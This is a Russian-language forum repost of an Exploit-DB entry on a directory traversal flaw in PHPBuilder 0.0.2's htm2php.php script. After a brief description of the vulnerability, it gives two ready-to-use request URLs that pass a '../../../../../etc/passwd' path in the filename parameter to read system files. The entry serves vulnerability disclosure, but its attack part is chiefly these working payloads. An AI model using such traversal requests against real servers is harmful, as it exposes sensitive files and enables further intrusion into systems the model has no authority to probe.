- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29303
- Проверка EDB
-
- Пройдено
- Автор
- THE MASTER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2006-11-08
PHPBuilder 0.0.2 - 'HTM2PHP.php' Directory Traversal
Код:
source: https://www.securityfocus.com/bid/21703/info
PHPBuilder is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
A remote attacker could exploit this vulnerability to reveal the contents of files that contain sensitive information that could aid in further attacks against the affected computer.
PHPBuilder 0.0.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/[Path]/lib/htm2php.php?filename=../../../../../etc/passwd
http://www.example.com/[Path]/sitetools/htm2php.php?filename=../../../../../etc/passwd- Источник
- www.exploit-db.com
